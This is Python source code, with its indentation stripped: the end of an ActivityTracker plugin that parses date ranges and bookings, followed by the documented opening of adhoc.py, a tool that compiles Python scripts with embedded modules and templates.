if project_name[-1].endswith(':'):
project_name = project_name[:-1]
return (client, project_name)
def _guess_startstop(datestr):
if not datestr:
raise ValueError('datestr cannot be empty')
if datestr == 'all':
start = None
stop = None
elif datestr == 'today':
start = datetime.datetime.now()
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month, start.day, 23, 59)
elif datestr == 'yesterday':
start = datetime.datetime.now() - ONE_DAY
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month, start.day, 23, 59)
elif datestr == 'week':
start = datetime.datetime.now()
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month, start.day, 23, 59)
start = first_weekday(start)
elif datestr == 'month':
start = datetime.datetime.now()
start = datetime.datetime(start.year, start.month, 1)
stop = last_monthday(start)
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
elif datestr == 'year':
start = datetime.datetime.now()
start = datetime.datetime(start.year, 1, 1)
stop = datetime.datetime.now()
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
else:
if RE_DATE.match(datestr) is not None:
start = datetime.datetime(*time.strptime(datestr, '%Y-%m-%d')[:3])
stop = datetime.datetime(start.year, start.month,
start.day, 23, 59)
else:
month_index = -1
for pos, month in enumerate(MONTHS):
if month is not None and month.startswith(datestr):
month_index = pos
break
if month_index == -1:
raise ValueError("Couldn't derive a date value from %r"
% datestr)
start = datetime.datetime.now()
start = datetime.datetime(start.year, month_index, 1)
stop = last_monthday(start)
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
return start, stop
def parse_startstop(date_filter):
"""
Takes a date range that understands common aliases and returns the start
and stop times as a tuple.
"""
date_filter = date_filter or ''
date_filter = date_filter.strip().lower()
if not date_filter:
date_filter = 'week'
datestrs = date_filter.split(':')
start_datestr = datestrs[0]
stop_datestr = ''
if len(datestrs) > 1:
stop_datestr = datestrs[1]
start, stop1 = _guess_startstop(start_datestr)
if stop_datestr:
start2, stop = _guess_startstop(stop_datestr)
else:
stop = stop1
return start, stop
class TextFileParser(AbstractFileParser):
def parse_input(self, input):
processor = Processor()
processor.process_input(input)
for client_name, client in processor.clients.items():
for project_name, project in client.projects.items():
new_prj = self.projects[client_name + '/' + project_name]
for booking in project.bookings:
interval = Interval(booking.start,
booking.stop,
booking.comment)
new_prj.intervals.append(interval) | ActivityTracker | /ActivityTracker-1.0.tar.gz/ActivityTracker-1.0/activitytracker/plugins/text.py | text.py |
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
# AdHoc Standalone Python Script Generator
# ########################################
#
# The *AdHoc* compiler can be used as a program (see `Script Usage`_)
# as well as a module (see :class:`adhoc.AdHoc`).
#
# Since the *AdHoc* compiler itself is installed as a compiled *AdHoc*
# script, it serves as its own usage example.
#
# After installation of the *adhoc.py* script, the full source can be
# obtained in directory ``__adhoc__``, by executing::
#
# adhoc.py --explode
#
# .. @@contents@@
#
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
"""\
.. _Script Usage:
adhoc.py - Python ad hoc compiler.
====== ====================
usage: adhoc.py [OPTIONS] [file ...]
or import adhoc
====== ====================
Options
=======
===================== ==================================================
-c, --compile compile file(s) or standard input into output file
(default: standard output).
-d, --decompile decompile file(s) or standard input into
output directory (default ``__adhoc__``).
-o, --output OUT output file for --compile/output directory for
--decompile.
-q, --quiet suppress warnings
-v, --verbose verbose test output
--debug[=NUM] show debug information
-h, --help display this help message
--documentation display module documentation.
--template list show available templates.
--eide[=COMM] Emacs IDE template list (implies --template list).
--template[=NAME] extract named template to standard
output. Default NAME is ``-``.
--extract[=DIR] extract adhoc files to directory DIR (default: ``.``)
--explode[=DIR] explode script with adhoc in directory DIR
(default ``__adhoc__``)
--implode implode script with adhoc
--install install adhoc.py script
-t, --test run doc tests
===================== ==================================================
*adhoc.py* is compatible with Python 2.4+ and Python 3. (For Python
<2.6 the packages *stringformat* and *argparse* are needed and
included.)
.. _END_OF_HELP:
.. |=NUM| replace:: ``[=NUM]``
Script Examples
===============
Templates
---------
Sections marked by |adhoc_template| can be retrieved as templates on
standard output.
Additionally, all other files compiled into an adhoc file with one of
================ ======================
|adhoc| ==> |adhoc_import|
|adhoc_verbatim| ==> |adhoc_template_v|
|adhoc_include| ==> |adhoc_unpack|
================ ======================
are accessible as templates.
``python adhoc.py --template list`` provides a list of templates:
>>> ign = main('adhoc.py --template list'.split())
================================================= ================================ ================
Command Template Type
================================================= ================================ ================
adhoc.py --template adhoc_test # !adhoc_test adhoc_import
adhoc.py --template adhoc_test.sub # !adhoc_test.sub adhoc_import
adhoc.py --template argparse_local # !argparse_local adhoc_import
adhoc.py --template namespace_dict # !namespace_dict adhoc_import
adhoc.py --template stringformat_local # !stringformat_local adhoc_import
adhoc.py --template use_case_000_ # !use_case_000_ adhoc_import
adhoc.py --template use_case_001_templates_ # !use_case_001_templates_ adhoc_import
adhoc.py --template use_case_002_include_ # !use_case_002_include_ adhoc_import
adhoc.py --template use_case_003_import_ # !use_case_003_import_ adhoc_import
adhoc.py --template use_case_005_nested_ # !use_case_005_nested_ adhoc_import
adhoc.py --template docutils.conf # docutils.conf adhoc_template_v
adhoc.py --template # - adhoc_template
adhoc.py --template README.txt # README.txt adhoc_template
adhoc.py --template adhoc_init # -adhoc_init adhoc_template
adhoc.py --template catch-stdout # -catch-stdout adhoc_template
adhoc.py --template col-param-closure # -col-param-closure adhoc_template
adhoc.py --template doc/USE_CASES.txt # doc/USE_CASES.txt adhoc_template
adhoc.py --template doc/index.rst # doc/index.rst adhoc_template
adhoc.py --template max-width-class # -max-width-class adhoc_template
adhoc.py --template rst-to-ascii # -rst-to-ascii adhoc_template
adhoc.py --template test # -test adhoc_template
adhoc.py --template MANIFEST.in # !MANIFEST.in adhoc_unpack
adhoc.py --template Makefile # !Makefile adhoc_unpack
adhoc.py --template README.css # !README.css adhoc_unpack
adhoc.py --template doc/Makefile # !doc/Makefile adhoc_unpack
adhoc.py --template doc/_static/adhoc-logo-32.ico # !doc/_static/adhoc-logo-32.ico adhoc_unpack
adhoc.py --template doc/adhoc-logo.svg # !doc/adhoc-logo.svg adhoc_unpack
adhoc.py --template doc/conf.py # !doc/conf.py adhoc_unpack
adhoc.py --template doc/make.bat # !doc/make.bat adhoc_unpack
adhoc.py --template doc/z-massage-index.sh # !doc/z-massage-index.sh adhoc_unpack
adhoc.py --template setup.py # !setup.py adhoc_unpack
================================================= ================================ ================
``python adhoc.py --template`` prints the standard template ``-``
(closing delimiter replaced by ellipsis):
>>> ign = main('./adhoc.py --template'.split()) #doctest: +ELLIPSIS
# @:adhoc_disable... allow modification of exploded sources in original place
sys.path.append('__adhoc__')
# @:adhoc_disable...
<BLANKLINE>
# @:adhoc_run_time... The run-time class goes here
# @:adhoc_run_time_engine... settings enabled at run-time
# @:adhoc_enable...
# RtAdHoc.flat = False
# @:adhoc_enable...
# @:adhoc_run_time_engine...
<BLANKLINE>
#import adhoc # @:adhoc...
``python adhoc.py --template test`` prints the template named ``-test``.
the leading ``-`` signifies disposition to standard output:
>>> ign = main('./adhoc.py --template test'.split())
Test template.
Extract
-------
The default destination for extracting files is the current working
directory.
Files extracted consist of
- packed files generated by |adhoc_include|
- templates generated by |adhoc_verbatim|
- templates with a file destination other than standard output
``python adhoc.py --extract __adhoc_extract__`` unpacks the following files into
directory ``__adhoc_extract__``:
>>> import shutil
>>> ign = main('./adhoc.py --extract __adhoc_extract__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_extract__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_extract__/MANIFEST.in
__adhoc_extract__/Makefile
__adhoc_extract__/README.css
__adhoc_extract__/README.txt
__adhoc_extract__/doc/Makefile
__adhoc_extract__/doc/USE_CASES.txt
__adhoc_extract__/doc/_static/adhoc-logo-32.ico
__adhoc_extract__/doc/adhoc-logo.svg
__adhoc_extract__/doc/conf.py
__adhoc_extract__/doc/index.rst
__adhoc_extract__/doc/make.bat
__adhoc_extract__/doc/z-massage-index.sh
__adhoc_extract__/docutils.conf
__adhoc_extract__/setup.py
__adhoc_extract__/use_case_000_.py
__adhoc_extract__/use_case_001_templates_.py
__adhoc_extract__/use_case_002_include_.py
__adhoc_extract__/use_case_003_import_.py
__adhoc_extract__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_extract__')
Export
------
The default destination for exporting files is the
subdirectory ``__adhoc__``.
Files exported consist of
- imported modules generated by |adhoc|
- all files covered in section `Extract`_
``python adhoc.py --explode __adhoc_explode__`` unpacks the following files into
directory ``__adhoc_explode__``:
>>> import shutil
>>> ign = main('./adhoc.py --explode __adhoc_explode__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_explode__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_explode__/MANIFEST.in
__adhoc_explode__/Makefile
__adhoc_explode__/README.css
__adhoc_explode__/README.txt
__adhoc_explode__/adhoc.py
__adhoc_explode__/adhoc_test/__init__.py
__adhoc_explode__/adhoc_test/sub/__init__.py
__adhoc_explode__/argparse_local.py
__adhoc_explode__/doc/Makefile
__adhoc_explode__/doc/USE_CASES.txt
__adhoc_explode__/doc/_static/adhoc-logo-32.ico
__adhoc_explode__/doc/adhoc-logo.svg
__adhoc_explode__/doc/conf.py
__adhoc_explode__/doc/index.rst
__adhoc_explode__/doc/make.bat
__adhoc_explode__/doc/z-massage-index.sh
__adhoc_explode__/docutils.conf
__adhoc_explode__/namespace_dict.py
__adhoc_explode__/rt_adhoc.py
__adhoc_explode__/setup.py
__adhoc_explode__/stringformat_local.py
__adhoc_explode__/use_case_000_.py
__adhoc_explode__/use_case_001_templates_.py
__adhoc_explode__/use_case_002_include_.py
__adhoc_explode__/use_case_003_import_.py
__adhoc_explode__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_explode__')
File Permissions
================
- File mode is restored.
- File ownership is not restored.
- File modification times are restored.
Since only naive datetimes are recorded, this only works correctly
within the same timezone.
.. @:adhoc_index_only:@
AdHoc Module
============
.. @:adhoc_index_only:@
"""
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
#
# Purpose
# =======
#
# *AdHoc* provides python scripts with
#
# - template facilities
# - default file generation
# - standalone module inclusion
#
# @:adhoc_index_only:@
# See also `Use Cases`_.
#
# @:adhoc_index_only:@
# *AdHoc* has been designed to provide an implode/explode cycle:
#
# ======== ======= ========= ======= =========
# source_0 xsource_0
# source_1 implode explode xsource_1
# ... ------> script.py ------> ...
# source_n xsource_n
# ======== ======= ========= ======= =========
#
# where ``xsource_i === source_i``. I.e., ``diff source_i xsource_i``
# does not produce any output.
#
# Quickstart
# ==========
#
# module.py:
#
# | # -\*- coding: utf-8 -\*-
# | mvar = 'value'
#
# script.py:
#
# | # -\*- coding: utf-8 -\*-
# | # |adhoc_run_time|
# | import module # |adhoc|
# | print('mvar: ' + module.mvar)
#
# Compilation::
#
# adhoc.py --compile script.py >/tmp/script-compiled.py
#
# Execution outside source directory::
#
# cd /tmp && python script-compiled.py
#
# shows::
#
# mvar: value
#
# Decompilation::
#
# cd /tmp && \
# mkdir -p __adhoc__ && \
# adhoc.py --decompile <script-compiled.py >__adhoc__/script.py
#
# .. |@:| replace:: ``@:``
# .. |:@| replace:: ``:@``
# .. |adhoc_run_time| replace:: |@:|\ ``adhoc_run_time``\ |:@|
# .. |adhoc| replace:: |@:|\ ``adhoc``\ |:@|
#
# Description
# ===========
#
# The *AdHoc* compiler/decompiler parses text for tagged lines and
# processes them as instructions.
#
# The minimal parsed entity is a tagged line, which is any line
# containing a recognized *AdHoc* tag.
#
# All *AdHoc* tags are enclosed in delimiters (default: |@:| and |:@|). E.g:
#
# |@:|\ adhoc\ |:@|
#
# Delimiters come in several flavors, namely line and section
# delimiters and a set of macro delimiters. By default, line and
# section delimiters are the same, but they can be defined separately.
#
# `Flags`_ are tagged lines, which denote a single option or
# command. E.g.:
#
# | import module # |@:|\ adhoc\ |:@|
# | # |@:|\ adhoc_self\ |:@| my_module_name
#
# `Sections`_ are tagged line pairs, which delimit a block of
# text. The first tagged line opens the section, the second tagged
# line closes the section. E.g.:
#
# | # |@:|\ adhoc_enable\ |:@|
# | # disabled_command()
# | # |@:|\ adhoc_enable\ |:@|
#
# `Macros`_ have their own delimiters (default: |@m| and |m>|). E.g.:
#
# | # |@m|\ MACRO_NAME\ |m>|
#
# The implementation is realized as class :class:`adhoc.AdHoc` which
# is mainly used as a namespace. The run-time part of
# :class:`adhoc.AdHoc` -- which handles module import and file export
# -- is included verbatim as class :class:`RtAdHoc` in the generated
# output.
#
# Flags
# -----
#
# :|adhoc_run_time|:
# The place where the *AdHoc* run-time code is added. This flag must
# be present in files, which use the |adhoc| import feature. It
# is not needed for the enable/disable features.
#
# This flag is ignored, if double commented. E.g.:
#
# | # # |adhoc_run_time|
#
# :|adhoc| [force] [flat | full]:
# Mark import line for run-time compilation.
#
# If ``force`` is specified, the module is imported, even if it
# was imported before.
#
# If ``flat`` is specified, the module is not recursively
# exported.
#
# If ``full`` is specified, the module is recursively
# exported. (This parameter takes priority over ``flat``).
#
# If neither ``flat`` nor ``full`` are specified,
# :attr:`adhoc.AdHoc.flat` determines the export scope.
#
# This flag is ignored, if the line is commented out. E.g.:
#
# | # import module # |adhoc|
#
# .. _adhoc_include:
#
# :|adhoc_include| file_spec, ...:
# Include files for unpacking. ``file_spec`` is one of
#
# :file:
# ``file`` is used for both input and output.
#
# :file ``from`` default-file:
# ``file`` is used for input and output. if ``file`` does not
# exist, ``default-file`` is used for input.
#
# :source-file ``as`` output-file:
# ``source-file`` is used for input. ``output-file`` is used for
# output. If ``source-file`` does not exist, ``output-file`` is
# used for input also.
#
# This flag is ignored, if double commented. E.g.:
#
# | # # |adhoc_include| file
#
# :|adhoc_verbatim| [flags] file_spec, ...:
# Include files for verbatim extraction. See adhoc_include_ for
# ``file_spec``.
#
# The files are included as |adhoc_template_v| sections. *file* is used
# as *export_file* mark. If *file* is ``--``, the template disposition
# becomes standard output.
#
# Optional flags can be any combination of ``[+|-]NUM`` for
# indentation and ``#`` for commenting. E.g.:
#
# | # |adhoc_verbatim| +4# my_file from /dev/null
#
# *my_file* (or ``/dev/null``) is read, commented and indented 4
# spaces.
#
# If the |adhoc_verbatim| tag is already indented, the specified
# indentation is subtracted.
#
# This flag is ignored, if double commented. E.g.:
#
# | # # |adhoc_verbatim| file
#
# :|adhoc_self| name ...:
# Mark name(s) as currently compiling. This is useful, if
# ``__init__.py`` imports other module parts. E.g:
#
# | import pyjsmo # |@:|\ adhoc\ |:@|
#
# where ``pyjsmo/__init__.py`` contains:
#
# | # |@:|\ adhoc_self\ |:@| pyjsmo
# | from pyjsmo.base import * # |@:|\ adhoc\ |:@|
#
# :|adhoc_compiled|:
# If present, no compilation is done on this file. This flag is
# added by the compiler to the run-time version.
#
# Sections
# --------
#
# :|adhoc_enable|:
# Leading comment char and exactly one space are removed from lines
# in these sections.
#
# :|adhoc_disable|:
# A comment char and exactly one space are added to non-blank
# lines in these sections.
#
# :|adhoc_template| -mark | export_file:
# If mark starts with ``-``, the output disposition is standard output
# and the template is ignored, when exporting.
#
# Otherwise, the template is written to output_file during export.
#
# All template parts with the same mark/export_file are concatenated
# to a single string.
#
# :|adhoc_template_v| export_file:
# Variation of |adhoc_template|. Automatically generated by |adhoc_verbatim|.
#
# :|adhoc_uncomment|:
# Treated like |adhoc_enable| before template output.
#
# :|adhoc_indent| [+|-]NUM:
# Add or remove indentation before template output.
#
# :|adhoc_import|:
# Imported files are marked as such by the compiler. There is no
# effect during compilation.
#
# :|adhoc_unpack|:
# Included files are marked as such by the compiler. There is no
# effect during compilation.
#
# :|adhoc_remove|:
# Added sections are marked as such by the compiler. Removal is
# done when exporting.
#
# Before compilation, existing |adhoc_remove| tags are renamed to
# |adhoc_remove_|.
#
# After automatically added |adhoc_remove| sections have been
# removed during export, remaining |adhoc_remove_| tags are
# renamed to |adhoc_remove| again.
#
# .. note:: Think twice, before removing material from original
# sources at compile time. It will violate the condition
# ``xsource_i === source_i``.
#
# :|adhoc_run_time_engine|:
# The run-time class :class:`RtAdHoc` is enclosed in this special
# template section.
#
# It is exported as ``rt_adhoc.py`` during export.
#
# Macros
# ------
#
# Macros are defined programmatically::
#
# AdHoc.macros[MACRO_NAME] = EXPANSION_STRING
#
# A macro is invoked by enclosing a MACRO_NAME in
# :attr:`adhoc.AdHoc.macro_call_delimiters`. (Default: |@m|, |m>|).
#
# :|MACRO_NAME|:
# Macro call.
#
# Internal
# --------
#
# :|adhoc_run_time_class|:
# Marks the beginning of the run-time class. This is only
# recognized in the *AdHoc* programm/module.
#
# :|adhoc_run_time_section|:
# All sections are concatenated and used as run-time code. This is
# only recognized in the *AdHoc* programm/module.
#
# In order to preserve the ``xsource_i === source_i`` bijective
# condition, macros are expanded/collapsed with special macro
# definition sections. (See :attr:`adhoc.AdHoc.macro_xdef_delimiters`;
# Default: |<m|, |m@|).
#
# :|adhoc_macro_call|:
# Macro call section.
#
# :|adhoc_macro_expansion|:
# Macro expansion section.
#
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
# @:adhoc_index_only:@
#
# .. include:: USE_CASES.txt
# @:adhoc_index_only:@
#
# AdHoc Script
# ============
# @:adhoc_index_only:@
#
# .. automodule:: adhoc
# :members:
# :show-inheritance:
#
# .. _namespace_dict:
#
# NameSpace/NameSpaceDict
# =======================
#
# .. automodule:: namespace_dict
# :members:
# :show-inheritance:
#
# @:adhoc_index_only:@
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
#
# .. |adhoc_self| replace:: |@:|\ ``adhoc_self``\ |:@|
# .. |adhoc_include| replace:: |@:|\ ``adhoc_include``\ |:@|
# .. |adhoc_verbatim| replace:: |@:|\ ``adhoc_verbatim``\ |:@|
# .. |adhoc_compiled| replace:: |@:|\ ``adhoc_compiled``\ |:@|
# .. |adhoc_enable| replace:: |@:|\ ``adhoc_enable``\ |:@|
# .. |adhoc_disable| replace:: |@:|\ ``adhoc_disable``\ |:@|
# .. |adhoc_template| replace:: |@:|\ ``adhoc_template``\ |:@|
# .. |adhoc_template_v| replace:: |@:|\ ``adhoc_template_v``\ |:@|
# .. |adhoc_uncomment| replace:: |@:|\ ``adhoc_uncomment``\ |:@|
# .. |adhoc_indent| replace:: |@:|\ ``adhoc_indent``\ |:@|
# .. |adhoc_import| replace:: |@:|\ ``adhoc_import``\ |:@|
# .. |adhoc_unpack| replace:: |@:|\ ``adhoc_unpack``\ |:@|
# .. |adhoc_remove| replace:: |@:|\ ``adhoc_remove``\ |:@|
# .. |adhoc_remove_| replace:: |@:|\ ``adhoc_remove_``\ |:@|
# .. |adhoc_run_time_class| replace:: |@:|\ ``adhoc_run_time_class``\ |:@|
# .. |adhoc_run_time_section| replace:: |@:|\ ``adhoc_run_time_section``\ |:@|
# .. |adhoc_run_time_engine| replace:: |@:|\ ``adhoc_run_time_engine``\ |:@|
# .. |@m| replace:: ``@|:``
# .. |m>| replace:: ``:|>``
# .. |<m| replace:: ``<|:``
# .. |m@| replace:: ``:|@``
# .. |MACRO_NAME| replace:: |@m|\ ``MACRO_NAME``\ |m>|
# .. |adhoc_macro_call| replace:: |<m|\ ``adhoc_macro_call``\ |m@|
# .. |adhoc_macro_expansion| replace:: |<m|\ ``adhoc_macro_expansion``\ |m@|
#
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
# --------------------------------------------------
# |||:sec:||| COMPATIBILITY
# --------------------------------------------------
import sys
# (progn (forward-line 1) (snip-insert-mode "py.b.printf" t) (insert "\n"))
# adapted from http://www.daniweb.com/software-development/python/code/217214
try:
printf = eval("print") # python 3.0 case
except SyntaxError:
printf_dict = dict()
try:
exec("from __future__ import print_function\nprintf=print", printf_dict)
printf = printf_dict["printf"] # 2.6 case
except SyntaxError:
def printf(*args, **kwd): # 2.4, 2.5, define our own Print function
fout = kwd.get("file", sys.stdout)
w = fout.write
if args:
w(str(args[0]))
sep = kwd.get("sep", " ")
for a in args[1:]:
w(sep)
w(str(a))
w(kwd.get("end", "\n"))
del printf_dict
# (progn (forward-line 1) (snip-insert-mode "py.f.isstring" t) (insert "\n"))
# hide from 2to3
exec('''
def isstring(obj):
return isinstance(obj, basestring)
''')
try:
isstring("")
except NameError:
def isstring(obj):
return isinstance(obj, str) or isinstance(obj, bytes)
# (progn (forward-line 1) (snip-insert-mode "py.b.dict_items" t) (insert "\n"))
try:
getattr(dict(), 'iteritems')
ditems = lambda d: getattr(d, 'iteritems')()
dkeys = lambda d: getattr(d, 'iterkeys')()
dvalues = lambda d: getattr(d, 'itervalues')()
except AttributeError:
ditems = lambda d: getattr(d, 'items')()
dkeys = lambda d: getattr(d, 'keys')()
dvalues = lambda d: getattr(d, 'values')()
import os
import re
# --------------------------------------------------
# |||:sec:||| CONFIGURATION
# --------------------------------------------------
dbg_comm = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dbg_twid = ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9))
dbg_fwid = ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (23))
# (progn (forward-line 1) (snip-insert-mode "py.b.dbg.setup" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.strings" t) (insert "\n"))
def _uc(string): # ||:fnc:||
return unicode(string, 'utf-8')
try:
_uc("")
except NameError:
_uc = lambda x: x
uc_type = type(_uc(""))
def uc(value): # ||:fnc:||
if isstring(value) and not isinstance(value, uc_type):
return _uc(value)
return value
def _utf8str(string): # ||:fnc:||
if isinstance(string, uc_type):
return string.encode('utf-8')
return string
def utf8str(value): # ||:fnc:||
if isstring(value):
return _utf8str(value)
return value
def _nativestr(string): # ||:fnc:||
# for python3, unicode strings have type str
if isinstance(string, str):
return string
# for python2, encode unicode strings to utf-8 strings
if isinstance(string, uc_type):
return string.encode('utf-8')
try:
return str(string.decode('utf-8'))
except UnicodeDecodeError:
return string
def nativestr(value): # ||:fnc:||
if isstring(value):
return _nativestr(value)
return value
# (progn (forward-line 1) (snip-insert-mode "py.f.strclean" t) (insert "\n"))
def strclean(value):
'''Make a copy of any structure with all strings converted to
native strings.
:func:`strclean` is good for :meth:`__str__` methods.
It is needed for doctest output that should be compatible with
both python2 and python3.
The output structure is not necessarily an exact copy of the input
structure, since objects providing iterator or item interfaces are
only copied through those!
'''
if isstring(value):
return _nativestr(value)
if hasattr(value, 'items'):
try:
out = type(value)()
except:
(t, e, tb) = sys.exc_info() # |:debug:|
printf(''.join(traceback.format_tb(tb)), file=sys.stderr)
printe('OOPS: ' + t.__name__ + ': ' + str(e) + ' [' + str(value.__class__.__name__) + '] [' + str(value) + ']')
for k, v in value.items():
out[strclean(k)] = strclean(v)
return out
if hasattr(value, '__iter__') or hasattr(value, 'iter'):
if isinstance(value, tuple):
out = []
else:
out = type(value)()
for e in value:
out.append(strclean(e))
if isinstance(value, tuple):
out = type(value)(out)
return out
return value
# (progn (forward-line 1) (snip-insert-mode "py.f.issequence" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.logging" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.ordereddict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.pyramid.activate" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.project.libdir" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.alchemy" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.ws" t) (insert "\n"))
# The standard template should be something useful
# @:adhoc_uncomment:@
# @:adhoc_template:@ -
# # @:adhoc_disable:@ allow modification of exploded sources in original place
sys.path.append('__adhoc__')
# # @:adhoc_disable:@
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_run_time:@
# @:adhoc_template:@ -
# @:adhoc_run_time:@ The run-time class goes here
# @:adhoc_run_time_engine:@ settings enabled at run-time
# @:adhoc_enable:@
# # RtAdHoc.flat = False
# # @:adhoc_template:@
# RtAdHoc.flat = False
# # @:adhoc_template:@ -
# @:adhoc_enable:@
# @:adhoc_run_time_engine:@
#import adhoc # @:adhoc:@
# @:adhoc_template:@
# (progn (forward-line 1) (snip-insert-mode "py.b.sformat" t) (insert "\n"))
try:
('{0}').format(0)
def sformat (fmtspec, *args, **kwargs):
return fmtspec.format(*args, **kwargs)
except AttributeError:
try:
import stringformat
except ImportError:
try:
import stringformat_local as stringformat # @:adhoc:@
except ImportError:
printf('error: (adhoc) stringformat missing.'
' Try *easy_install stringformat*.', file=sys.stderr)
exit(1)
def sformat (fmtspec, *args, **kwargs):
return stringformat.FormattableString(fmtspec).format(
*args, **kwargs)
import base64
import urllib
#import something.non.existent # @:adhoc:@
try:
import namespace_dict
except ImportError:
import namespace_dict # @:adhoc:@
# copy of ws_prop_dict.dict_dump
def dict_dump(dict_, wid=0, trunc=0, commstr=None, tag=None, out=None): # ||:fnc:||
'''Dump a dictionary.'''
if out is None:
out = sys.stderr
if commstr is None:
commstr = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dbg_twid = ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9))
if tag is None:
tag = ':DBG:'
max_wid = 0
for key in dict_.keys():
_wid = len(key)
if max_wid < _wid:
max_wid = _wid
dbg_fwid = ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (max_wid))
if dbg_fwid < max_wid:
dbg_fwid = max_wid
printf(sformat('{0}{1}', commstr, '-' * 30), file=out)
indent = (sformat("{0}{3:^{1}} {4:<{2}s}: ",
commstr, dbg_twid, dbg_fwid,
'', ''))
for key, value in sorted(dict_.items()):
value = str(value)
value = value.replace('\n', '\\n')
value = value.replace('\r', '\\r')
value = value.replace('\t', '\\t')
value = value.replace('\f', '\\f')
if wid == 0:
wid = 78 - len(indent) - 1
if wid < 50:
wid = 50
start = 0
limit = len(value)
value_lines = []
while start < limit:
line = value[start:start+wid]
space_pos = wid - 1
if len(line) == wid:
space_pos = line.rfind(' ')
if space_pos > 0:
line = line[:space_pos + 1]
else:
space_pos = wid - 1
value_lines.append(line)
start += space_pos + 1
if trunc > 0:
value_lines = value_lines[:trunc]
value_lines[-1] = sformat('{0}[', value_lines[-1])
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}",
commstr, dbg_twid, dbg_fwid,
tag, key, value_lines[0]), file=out)
for line in value_lines[1:]:
printf(sformat('{0}{1}',indent, line), file=out)
def dump_attr(obj, wid=0, trunc=0, commstr=None, # ||:fnc:||
tag=None, out=None):
if out is None:
out = sys.stdout
dict_dump(
vars(obj), wid=wid, trunc=trunc, commstr=commstr, tag=tag, out=out)
printe = printf
# (progn (forward-line 1) (snip-insert-mode "py.b.posix" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.os.system.sh" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.prog.path" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.line.loop" t) (insert "\n"))
# --------------------------------------------------
# |||:sec:||| CLASSES
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.c.placeholder.template" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.key.hash.ordered.dict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.progress" t) (insert "\n"))
# --------------------------------------------------
# |||:sec:||| EXCEPTION
# --------------------------------------------------
class AdHocError(Exception): # ||:cls:||
pass
# --------------------------------------------------
# |||:sec:||| ADHOC
# --------------------------------------------------
# @:adhoc_run_time_section:@ START
import sys
import os
import re
# @:adhoc_uncomment:@
# @:adhoc_template:@ -catch-stdout
try:
from cStringIO import StringIO as _AdHocBytesIO, StringIO as _AdHocStringIO
except ImportError:
try:
from StringIO import StringIO as _AdHocBytesIO, StringIO as _AdHocStringIO
except ImportError:
from io import BytesIO as _AdHocBytesIO, StringIO as _AdHocStringIO
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_run_time_section:@ off
if not hasattr(os.path, 'relpath'):
def relpath(path, start=os.curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
start_list = os.path.abspath(start).split(os.sep)
path_list = os.path.abspath(path).split(os.sep)
# Work out how much of the filepath is shared by start and path.
i = len(os.path.commonprefix([start_list, path_list]))
rel_list = [os.pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return os.curdir
return os.path.join(*rel_list)
os.path.relpath = relpath
del relpath
AH_CHECK_SOURCE = '''\
not in section
# >:cmd:< arg0 arg1 # comment
# <:tag:> on
in section
# >:cmd:< arg2 arg3 # comment
in section
# <:tag:> off
not in section
# <:tag2:> on
in section
in section
# <:tag2:> off
not in section
'''
# @:adhoc_run_time_section:@ on
# @:adhoc_run_time_class:@
class AdHoc(object): # |||:cls:|||
# @:adhoc_run_time_section:@ off
"""
:class:`AdHoc` is mainly used as a namespace, which is partially
included verbatim as :class:`RtAdHoc` in the generated output.
It is only instantiated for compiling adhoc output
(:meth:`compileFile`, :meth:`compile`).
**Attributes**
The following class attrbutes determine the operation of AdHoc:
- :attr:`line_delimiters`
- :attr:`section_delimiters`
- :attr:`template_process_hooks`
- :attr:`extra_templates`
- :attr:`export_dir`
- :attr:`extract_dir`
- :attr:`flat`
- :attr:`frozen`
- :attr:`quiet`
- :attr:`verbose`
- :attr:`debug`
